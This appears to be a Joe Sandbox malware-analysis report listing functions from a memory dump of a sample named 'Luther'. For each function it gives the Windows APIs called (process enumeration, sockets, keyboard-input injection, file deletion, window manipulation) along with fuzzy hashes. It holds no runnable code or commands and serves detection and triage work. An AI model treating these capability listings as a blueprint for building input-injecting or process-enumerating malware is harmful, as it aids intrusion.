Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 9e32edc21a9883cb3b91df986770ce09fee1e8f27f8d55089bd82b2909fe2170
Instruction ID: e1e59eeb99f7eeceb2b7f6c4754a2b7f8d2368cac07f94670513c87ced8edc80
Opcode Fuzzy Hash: 9e32edc21a9883cb3b91df986770ce09fee1e8f27f8d55089bd82b2909fe2170
Instruction Fuzzy Hash: 1981F571A00109AFCF14DF94C988EEEB7B9FF89315F204599E516BB250DB71AE06CB60

Function 00EBB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00EBB10C
Process32FirstW.KERNEL32(00000000,?), ref: 00EBB11A

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Process32NextW.KERNEL32(00000000,?), ref: 00EBB1FC
CloseHandle.KERNEL32(00000000), ref: 00EBB20B

Part of subcall function 00E4E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E74D73,?), ref: 00E4E395

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: d80a50e3a9b594be3b58129c333deb74ba1d5650cda1de93a069698d979502ca
Instruction ID: 88c039e857d60456c3ef5826f2a503a8e39612f032f3f2317298920ece890c51
Opcode Fuzzy Hash: d80a50e3a9b594be3b58129c333deb74ba1d5650cda1de93a069698d979502ca
Instruction Fuzzy Hash: 86514CB1508300AFD310EF25CC8AA6BBBE8FF88754F40592DF585A7251EB71E905CB92

Function 00E71711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E71840

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 089572a106cf5a99f8b790ca8f3b9f6f987b436eea0bae60bea97cdef7b8f9a7
Instruction ID: 7284c7d043c47222192ae9c60858da4027f2f7ea084dd8b01af8846d7823ecb2
Opcode Fuzzy Hash: 089572a106cf5a99f8b790ca8f3b9f6f987b436eea0bae60bea97cdef7b8f9a7
Instruction Fuzzy Hash: 2E415E31640300ABEB287EBD9C46ABE36E9EF02770F14A5A6F81CF7191DA75480153A3

Function 00EB2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00EB255A
WSAGetLastError.WSOCK32 ref: 00EB2568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EB25E7
WSAGetLastError.WSOCK32 ref: 00EB25F1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 15fdaf3fb405f65e041ce7bad6a71ef692f768e6ed4bbd206c3698e6c247bd8f
Instruction ID: 253ed0eadc76dfbbbf9bd6be8fa10c96a4be7bc6ae8b9c5c25a5d2b90e853933
Opcode Fuzzy Hash: 15fdaf3fb405f65e041ce7bad6a71ef692f768e6ed4bbd206c3698e6c247bd8f
Instruction Fuzzy Hash: 3441D474A00200AFE720AF24C88AF667BE5AF04758F54D49CF655AF6D2C772ED42CB91

Function 00EC6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EC6D1A
ScreenToClient.USER32(?,?), ref: 00EC6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00EC6DBA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 308148cee79d6bfab5f6a994ace7250f37855a00e3b3294b0b0a677e43d46afe
Instruction ID: 921ac6603e3ee71e6f7b4ba6f7b9306018205d81a4f9573b3cb051de2ab53f4b
Opcode Fuzzy Hash: 308148cee79d6bfab5f6a994ace7250f37855a00e3b3294b0b0a677e43d46afe
Instruction Fuzzy Hash: BF512D74A00209AFCF24DF64D984EAE7BB6FF44324F10956EF915A7290D731AE82DB50

Function 00E6B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d9707fb5f43fce0cb55567ddb6c18ed5674ac30c0f41cffa1917d08c687ff48
Instruction ID: 8eb72866633ebcb219b5faee6f96f434afb1535100f7fb2eee261909d8e9a77f
Opcode Fuzzy Hash: 8d9707fb5f43fce0cb55567ddb6c18ed5674ac30c0f41cffa1917d08c687ff48
Instruction Fuzzy Hash: 5C413871A40744AFD728AF78EC41BAABBEDEB88750F10952EF111FB291D37199418780

Function 00EA611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EA61C8
GetLastError.KERNEL32(?,00000000), ref: 00EA61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EA6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EA623F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 03e630527c717b3d4b3b32b1ae1b4c9e7cda767b94a2e9d115098538b24e4c37
Instruction ID: d3a5b6bd981edb9fab8546027fc7c3f1202e3e864f0588702a8606685e5fa49d
Opcode Fuzzy Hash: 03e630527c717b3d4b3b32b1ae1b4c9e7cda767b94a2e9d115098538b24e4c37
Instruction Fuzzy Hash: A4410735600610DFCB11EF15C949A5ABBF2EF8A714B198498E94ABF362CB35FD01CB91

Function 00E9B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E9B473
SetKeyboardState.USER32(00000080), ref: 00E9B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E9B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E9B54F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f37635d3e0f64ac8d2d088d6950287450761298deebed17c567234d80d409eea
Instruction ID: 0c3ce3c86bf9fce2208e09e7b569d3e6c9a0746cbde9f939291e5fa66f3e0cd8
Opcode Fuzzy Hash: f37635d3e0f64ac8d2d088d6950287450761298deebed17c567234d80d409eea
Instruction Fuzzy Hash: 51316DB0A002086EFF30CB25AD05BFE7BB6AF44314F04522AE0A5B61D2D37589859791

Function 00E9B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E9B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00E9B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00E9B63B
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E9B68D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: fd6452997a3d43dad6dc3a4e7e421839481ed60feb93c9081ccce52cbab2ebfa
Instruction ID: 2fe7eec6d5a04e53ff0b193f8f7727e40346297a4f076bfeccf9367cd53751d9
Opcode Fuzzy Hash: fd6452997a3d43dad6dc3a4e7e421839481ed60feb93c9081ccce52cbab2ebfa
Instruction Fuzzy Hash: BC313C30944608AFFF308B659D05BFE7BB6AF85314F04523EE481B61D2C375AA46CB92

Function 00EC80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00EC80D4
GetWindowRect.USER32(?,?), ref: 00EC814A
PtInRect.USER32(?,?,?), ref: 00EC815A
MessageBeep.USER32(00000000), ref: 00EC81C6

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 54a93ac0585d8fd6565eb0c7740491a64c86bb533022c3adc25b4131e0ce0834
Instruction ID: 8218c27b3bd3d79c941fe00dd6a7012caa1100daf5465edbf6cb655f7426129a
Opcode Fuzzy Hash: 54a93ac0585d8fd6565eb0c7740491a64c86bb533022c3adc25b4131e0ce0834
Instruction Fuzzy Hash: 72417A30A02219DFCB15CF59CB84FA9B7F5FB49314F1851ACE954AB261CB32A847DB90

Function 00EC2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00EC2187

Part of subcall function 00E94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E943AD
Part of subcall function 00E94393: GetCurrentThreadId.KERNEL32 ref: 00E943B4
Part of subcall function 00E94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E92F00), ref: 00E943BB

GetCaretPos.USER32(?), ref: 00EC219B
ClientToScreen.USER32(00000000,?), ref: 00EC21E8
GetForegroundWindow.USER32 ref: 00EC21EE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a3f1e2e0526336d41cdbdc6cda40ff396de25763ce5e56244af77a4656df6a0e
Instruction ID: fc0c280ef89f0f4ebbfc1333d51c2046ea32b783ccf630d9bdd5403c2fdec786
Opcode Fuzzy Hash: a3f1e2e0526336d41cdbdc6cda40ff396de25763ce5e56244af77a4656df6a0e
Instruction Fuzzy Hash: 6E3150B1D01209AFCB04DFA5C985DAEBBF8EF48304B54506EE515F7251D7319E46CBA0

Function 00E9E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF

_wcslen.LIBCMT ref: 00E9E8E2
_wcslen.LIBCMT ref: 00E9E8F9
_wcslen.LIBCMT ref: 00E9E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E9E92F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: bf91319169f4cdee23d4fece0432d68c00455abf06b9340e88f0a62a9acd6b1d
Instruction ID: 02adb79eef4093d48472ded15c6e3b13725e91f68b572d7faf4fe58cb3043af1
Opcode Fuzzy Hash: bf91319169f4cdee23d4fece0432d68c00455abf06b9340e88f0a62a9acd6b1d
Instruction Fuzzy Hash: C321A3B1901214AFDF10EFA8D982BAEB7F8EF85755F1450A4F904BB381D6709E41C7A1

Function 00EC9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0

GetCursorPos.USER32(?), ref: 00EC9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EC9A72
GetCursorPos.USER32(?), ref: 00EC9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00EC9AF0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4d31650790b0e9e532d6834bb936af5e64de675eaf60a39e07ed3a87593dda7f
Instruction ID: 0236d4fe67ffc5a0824f261c2c6a4ff7cd8a4e6bf5948c9b38452fea1e35268c
Opcode Fuzzy Hash: 4d31650790b0e9e532d6834bb936af5e64de675eaf60a39e07ed3a87593dda7f
Instruction Fuzzy Hash: 73217A35600018BFCF258F95C84CEEA7BB9FB49354F404169FA05AB1A2D7329952EB60

Function 00E9DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00ECDC30), ref: 00E9DBA6
GetLastError.KERNEL32 ref: 00E9DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E9DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ECDC30), ref: 00E9DC21

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: b526ae8475c46610e8151ed8a57a97c9b30c855382bbca4fd8d3f7b141b792b1
Instruction ID: 215569b5e388c0ad32f516eb3845c4f6d9e6fc62428bcab6d1ea17d9e50898e8
Opcode Fuzzy Hash: b526ae8475c46610e8151ed8a57a97c9b30c855382bbca4fd8d3f7b141b792b1
Instruction Fuzzy Hash: EC21917110C3159F8B00DF28CD8499ABBE8EF56368F101A2DF499E32A1D732D94ACB42

Function 00EC321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00EC32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EC32DC

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 13a68ad6b225d4756f9802f158133a7baed6cdb862cb35dcefb8d7ae2d600ac8
Instruction ID: a33b97a667034510096ca74483ca8ce34a79cd72c7fe1c5ef1d0ac6310119628
Opcode Fuzzy Hash: 13a68ad6b225d4756f9802f158133a7baed6cdb862cb35dcefb8d7ae2d600ac8
Instruction Fuzzy Hash: 0A219431204511AFD7189B24C845F6A7B95AB81314F24815DF826AB2A1C773ED42C7D0

Function 00E9825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E996E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E98271,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?), ref: 00E996F3
Part of subcall function 00E996E4: lstrcpyW.KERNEL32(00000000,?,?,00E98271,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E99719
Part of subcall function 00E996E4: lstrcmpiW.KERNEL32(00000000,?,00E98271,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?), ref: 00E9974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E9828A
lstrcpyW.KERNEL32(00000000,?,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E982B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E982EB

Strings

cdecl, xrefs: 00E982E2

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 8e42d273d2f966284c89b381cbf64de4e0a92583c711d9548010102afb600064
Instruction ID: 880c6aacb4dd5b04fe4a3859bec630ff806cae3477784bf214018696e85ca80d
Opcode Fuzzy Hash: 8e42d273d2f966284c89b381cbf64de4e0a92583c711d9548010102afb600064
Instruction Fuzzy Hash: 0D11E17A200241AFCF149F38C844E7A77E9FF4A754B10502AF942D7261EF329812C791

Function 00EC60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00EC615A
_wcslen.LIBCMT ref: 00EC616C
_wcslen.LIBCMT ref: 00EC6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC62B5

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: c917e1731253c61d5f6835f517c81cb3e519fafcee86d876b14ecbaa511d0b60
Instruction ID: e5c5d2150237365ce22491af0a5fa01c8edf33bf202e200200e0c2f0227cb1f8
Opcode Fuzzy Hash: c917e1731253c61d5f6835f517c81cb3e519fafcee86d876b14ecbaa511d0b60
Instruction Fuzzy Hash: E011067560020896DB10DF648E84FEF77BCEB51358B14502FF905F5181E772C986CB60

Function 00E62079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fff41ae51f8e619b8fd620c753fff0e9cc66662cf25b6218bf8ac7188ed11140
Instruction ID: ad6512c14a06404e97d1c3fdb1f2b4fa16108e78867ac5aedfed026af9bcc9ef
Opcode Fuzzy Hash: fff41ae51f8e619b8fd620c753fff0e9cc66662cf25b6218bf8ac7188ed11140
